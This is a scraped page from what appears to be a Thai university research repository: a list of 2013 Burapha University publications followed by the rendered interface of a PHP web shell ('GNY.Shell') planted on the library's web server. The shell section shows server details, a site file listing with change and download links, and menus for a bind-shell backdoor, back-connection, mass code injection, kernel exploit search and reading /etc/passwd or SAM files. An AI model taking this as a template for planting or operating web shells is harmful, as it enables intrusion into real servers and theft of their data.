งานวิจัยมหาวิทยาลัยบูรพา

Found 2125 results
Author Keyword Title [ Year(Asc)]
2556
สาธร หมื่นสกุล., วัลภา คุณทรงเกียรติ, อาภรณ์ ดีนาน., Sathorn Muensakul., Wanlapa Kunsongkeit., Aporn Deenan. ผลของการให้โปรแกรมอบอุ่นร่างกายต่ออุณหภูมิแกนและอาการหนาวสั่นในหญิงที่มารับการผ่าตัดคลอดบุตรทางหน้าท้องที่ได้รับการระงับความรู้สึกด้วยวิธีฉีดยาชาเข้าช่องน้ำไขสันหลัง. วารสารคณะพยาบาลศาสตร์ มหาวิทยาลัยบูรพา = The Journal of Faculty of Nursing Burapha University. 2556;21(4)
วิเชียร ชาลี., Wichian Chalee. ผลของความเข้มข้นสารละลายโซเดียมไฮดรอกไซด์ต่อการซึมผ่านน้ำและกำลังอัดของจีโอพอลิเมอร์คอนกรีตพรุนจากเถ้าถ่านหิน. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
นงนุช ตั้งเกริกโอฬาร., จิรายุ สินเจริญทรัพย์., Nongnud Tangkrock-olan., Jirayu Sincharoensup. ผลของความเค็มต่ออัตราการรอดตายและการเปลี่ยนแปลงปริมาตรของเพรียงทราย (Perinereis nuntia). วารสารวิทยาศาสตร์บูรพา 2556;18(2)
จารุนันท์ ประทุมยศ., วรเทพ มุธุวรรณ., ณัฐวุฒิ เหลืองอ่อน., วิรชา เจริญดี., วิไลวรรณ พวงสันเทียะ., ศิริวรรณ ชูศรี., Jarunan Pratoomyot., Vorathep Muthwan., Nattawut Luang-oon., Wiracha Charoendee., Wilaiwan Phuangsanthia., Siriwan Choosri. ผลของอาหารต่อการเจริญเติบโต การรอดตาย และการเจริญพันธุ์ของกุ้งการ์ตูน (Hymenocera picta) ที่เกิดจากการเพาะเลี้ยง. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
สุดสายชล หอมทอง., วชิราภรณ์ ก้องกังวาลย์., Sudsaichon Homthong., Wachiraporn Kongkangwal. ผลของอาหารเลี้ยงเชื้อต่อการเจริญของ Chaetoceros calcitrans. วารสารวิทยาศาสตร์บูรพา = Burapha Science Journal 2556;18(2)
กันทิมา สุวรรณพงศ์., Guntima Suwannapong. ผลของอุณหภูมิต่อการเจริญของแมลงวันหัวเขียวที่มีบทบาทสำคัญทางนิติเวชในประเทศไทย. ชลบุรี. (chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
ศศิวุฑฒิ์ วงษ์มณฑา. ผลของเงินส่งกลับของแรงงานต่อรายจ่ายครัวเรือนในประเทศไทย. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University); 2556.
ภรภัทร เฮงอุดมทรัพย์., วารี กังใจ., รวีวรรณ เผ่ากัณหา., Pornpat Hengudomsub., Waree Kangchai., Raweewan Paokunha. ผลของโปรแกรมการปรับพฤติกรรมทางปัญญาต่อความเครียดในผู้ดูแลผู้ป่วยสูงอายุสมองเสื่อม. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
เมืองศิริ. ยุพิน, วัลภา คุณทรงเกียรติ, Wanlapa Kunsongkeit., ภาวนา กีรติยุตวงศ์., Pawana Keeratiyutawong. ผลของโปรแกรมส่งเสริมความสามารถการจัดการตนเองของผู้ป่วยโรคเบาหวานต่อค่าน้ำตาลสะสม. วารสารคณะพยาบาลศาสตร์ มหาวิทยาลัยบูรพา = Journal of faculty of nursing Burapha University. 2556;21(1)
สุภาวดี เงินยิ่ง., พิริยา ศุภศรี., วรรณทนา ศุภสีมานนท์., Piriya Suppasri., Wantana Suppaseemanont. ผลของโปรแกรมส่งเสริมสุขภาพต่อพฤติกรรมสุขภาพด้านโภชนาการและการจัดการกับความเครียดในหญิงตั้งครรภ์วัยรุ่น. วารสารคณะพยาบาลศาสตร์ มหาวิทยาลัยบูรพา = The Journal of Faculty of Nursing Burapha University. 2556;21(4)
สุกัญญา เจริญวัฒนะ., กนก พานทอง., จันทนา วังคะออม., Sukanya Chardenwattana., Kanok Panthong., Sukanya Charoenwattana. พฤติกรรมการออกกำลังกายแบบยั่งยืน. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
ธนิดา ตระกูลสุจริตโชค., ปริยา นุพาสันต์., Thanida Trakulsujaridchot., Pariya Nuphasant. พอลิเมอร์นาโนคอมโพสิตลาเทกซ์ : สมบัติต้านการเจริญของเชื้อจุลินทรีย์และสมบัติทางเคมีกายภาพ. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
วรเทพ มุธุวรรณ., เสาวภา สวัสดิ์พีระ., ณัฐวุฒิ เหลืองอ่อน., ปรารถนา ควรดี., ศิริวรรณ ชูศรี., นัญทิญา ยิ้มเจริญ., อธิกพันธ์ ภูธนศิริชนิสรา., Vorathep Muthwan., Saowapa Sawatpeera, Nattawut Luang-oon., Pratthana Khuandee., Siriwan Choosri. พัฒนาการ การเจริญเติบโตและอัตราการรอดตายของลูกกุ้งการ์ตูนวัยอ่อน (Hymenocera picta) ที่อนุบาลด้วยระบบการเลี้ยงที่แตกต่างกัน. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
ศิวัช บุญเกิด., ชัยยนต์ ประดิษฐศิลป์., ปรีชา เปี่ยมพงษ์สานต์., Chaiyon Praditsil., Pricha Plampongsant., Siwat Bunkerd. พัฒนาการเครือข่ายอำนาจท้องถิ่นหลังการเปลี่ยนแปลง 14 ตุลาคม พ.ศ.2516 กรณีศึกษาจังหวัดราชบุรี. วารสารวิชาการมนุษยศาสตร์และสังคมศาสตร์ มหาวิทยาลัยบูรพา 2556;21(35)
วรรณภา กสิฤกษ์. พันธุศาสตร์เซลล์ของปลาวงศ์ย่อยปลาสลิดหินบางชนิดในประเทศไทย. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
อนุกูล บูรณประทีปรัตน์., พรนันท์ คุณธร., ประสาร อินทเจริญ., สุธิดา กาญจน์อติเรกลาภ., Anukul Buranapratheprat., Poranan Khunathorn., Prasarn Intacharoen., Suthida Kan-atireklarp. ฟลักซ์ของตะกอนแขวนลอยบริเวณปากแม่น้ำประแสร์ จังหวัดระยอง พ.ศ. 2553. วารสารวิทยาศาสตร์บูรพา = Burapha Science Journal 2556;18(2)
อนุกูล บูรณประทีปรัตน์., ยชนา เชิดชูจันทร์., นฤมล คงเมือง., ประสาร อินทเจริญ., สุธิดา กาญจน์อติเรกลาภ., วิชญา กันบัว., Anukul Buranapratheprat., Yodchana Choetchoojun., Naruemon Kongmaung., Prasarn Intacharoen., Suthida Kan-atireklarp., Vichaya Kunboa. ฟลักซ์ของสารอาหารอนินทรีย์ละลายน้ำบริเวณปากแม่น้ำประแสร์ จังหวัดระยองในฤดูแล้งและฤดูน้ำมากในปี พ.ศ. 2553. วารสารวิทยาศาสตร์บูรพา = Burapha Science Journal 2556;18(2)
สุเมตต์ ปุจฉาการ., คมสัน หงภัทรคีรี, , Sumatt Putchakarn. ฟองน้ำทะเลและเอคไตโนเดิร์มในพื้นที่ปกปักพันธุกรรมพืชทางทะเล หมู่เกาะแสมสาร จังหวัดชลบุรี. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
สกุล อ้นมา., สถาพร ไปเหนือ., Sakun Onma., Sathaporn Painuea. ภาพลักษณ์ของพระสงฆ์ในมุมมองของประชาชน :กรณีศึกษา ตำบลแสนสุข อำเภอเมือง จังหวัดชลบุรี. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
อาภรณ์ ดีนาน., สงวน ธานี., Aporn Deenan., Sanguan Thanee. ภาวะอ้วนของวัยรุ่น: ประสบการณ์การป้องกันและควบคุมน้ำหนักเกินของวัยรุ่นและผู้ปกครอง. วารสารคณะพยาบาลศาสตร์ มหาวิทยาลัยบูรพา = The Journal of Faculty of Nursing Burapha University. 2556;21(3)
ธนพัฒน์ เล็กเกียรติขจร., อรรัมภา ไวยมุกข์., เอกพล ทรงประโคน., ศิริศักดิ์ จึงถาวรรณ, Tanapat Lekkiatkhachorn., Awnrumpa Waiyamuk., Ekapon Songprakhon., Sirisak Jungthawan. มาตรการทางกฎหมายเพื่อการควบคุมการใช้สิทธิในทรัพย์สินทางปัญญาอย่างเป็นธรรมด้านเทคโนโลยีชีวภาพทางการเกษตรของไทย. วารสารการเมือง การบริหาร และกฎหมาย 2556;5(3)
วิเชียร ชาลี., Wichian Chalee. ระดับคลอไรด์วิกฤติในคอนกรีตที่ผสมเถ้าแกลบเปลือกไม้ที่แช่ในสภาวะแวดล้อมทะเล. วารสารวิทยาศาสตร์บูรพา = Burapha Science Journal 2556;18(2)
วัชรินทร์ ดงบัง., Watcharin Dongbang. รังสีอินฟราเรดและการประยุกต์ใช้ในอุตสาหกรรมอาหาร. วารสารวิทยาศาสตร์บูรพา = Burapha Science Journal 2556;18(2)
สุเนตร สุวรรณละออง, Sunate Suwanlaong., สุธิดา แจ้งประจักษ์., Suthida Changprachak. รูปแบบการจัดการปัญหาอาชญากรรมของสถานีตำรวจภูธรเมืองพัทยา. วารสารวิชาการมนุษยศาสตร์และสังคมศาสตร์ มหาวิทยาลัยบูรพา 2556;21(37)
สุธิดา แจ้งประจักษ์., Suthida Changprachak. รูปแบบการจัดสวัสดิการผู้สูงอายุ: กรณีศึกษาตำบลหนองรี อำเภอเมือง จังหวัดชลบุรี. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.

Pages

GNY.Shel! Encoded v1.1 edited B.Y $c0rPi0n
 _____ _  ___   __ _____ _     _ _ 
 / ____| \ | \ \  / // ____| |    | | |
| | __| \| |\ \_/ /| (___ | |__  ___| | |
| | |_ | . ` | \  / \___ \| '_ \ / _ \ | |
| |__| | |\ | | | _ ____) | | | | __/ | |
             \_____|_| \_| |_|(_)_____/|_| |_|\___|_|_| {V1.1 edited by $c0rPi0n}
Apache/2.2.22 (EL). PHP/5.3.8
Kernel: Linux www.lib.buu.ac.th 2.6.18-371.1.2.el5 #1 SMP Tue Oct 22 12:51:53 EDT 2013 x86_64Safe-Mode: OFF (not secure)
uid=48(apache) gid=48(apache) groups=48(apache) Disabled PHP Functions: NONE
cURL: ON
Free 277.37 GB of 389.83 GB (71.15%)Server IP: 10.32.1.15 - Your IP: 54.92.242.86

/var/www/html/www/buuir/research/   drwxrwxr-x
[Home]    [Back]    [Forward]    [Up]    [Refresh]    [Search]    [Buffer]    

[String/Hash Tools]    [Processes]    [Users]    [System Information]    [SQL Manager]    [Reverse IP]    [Kernel Exploit Search]    [Execute PHP Code]    [PHP Info]
    
[PHP Tools]    [Bind Shell Backdoor]    [Back-Connection]    [Mass Code Injection]    [Exploits]    [cPanel Finder]    [RFI/LFI Finder]    [Install IP:Port Proxy]    [Install PHP Proxy]    [Suicide Script]
    
Listing folder (22 files and 8 folders):

Name [asc] Size Modify Owner/Group Perms Action
.. LINK 01.09.2014 14:07:15 500/500 drwxrwxr-x [info] 
. LINK 24.01.2015 12:35:08 500/500 drwxrwxr-x [info] 
[scripts] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[profiles] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[includes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[sites] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[modules] DIR 24.01.2015 12:55:44 500/500 drwxr-xr-x [info] 
[misc] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[themes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[under] DIR 03.06.2014 15:19:55 500/500 drwxrwxr-x [info] 
 CHANGELOG.txt 63.49 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 UPGRADE.txt 9.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 robots.txt 1.52 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 index.php 529 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.mysql.txt 1.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 xmlrpc.php 417 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.sqlite.txt 1.27 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 web.config 2 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 README.txt 3.41 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction_buuir.jpg 44.98 KB 03.06.2014 15:53:14 500/500 -rw-r--r-- [info] [change] [download] 
 MAINTAINERS.txt 7.77 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 LICENSE.txt 17.67 KB 17.09.2011 21:50:20 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.txt 17.44 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction.html 296 B 03.06.2014 15:56:51 500/500 -rw-r--r-- [info] [change] [download] 
 authorize.php 6.45 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .htaccess 5.06 KB 08.03.2013 17:07:32 500/500 -rw-r--r-- [info] [change] [download] 
 cron.php 720 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 update.php 18.88 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .gitignore 174 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 install.php 688 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.pgsql.txt 1.83 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 COPYRIGHT.txt 996 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 

  


Enter:
 
Kernel Info:

Functions
Make Dir
Go Dir


 


[ Read-Only ]


 
Aliases
Make File
Go File


 


[ Read-Only ]


 

PHP Safe-Mode Bypass (Read File)

File:

e.g.: /etc/passwd or C:\WINDOWS\system32\.SAM
PHP Safe-Mode Bypass (Directory Listing)

Dir:

e.g.: /etc/ or C:\

Search
  - regexp 

Upload
 
[ Read-Only ]

.:[ GNY.Shell Encoded v1.1 ! Stand@rd Edition | Generated in: 0.0215 ]:.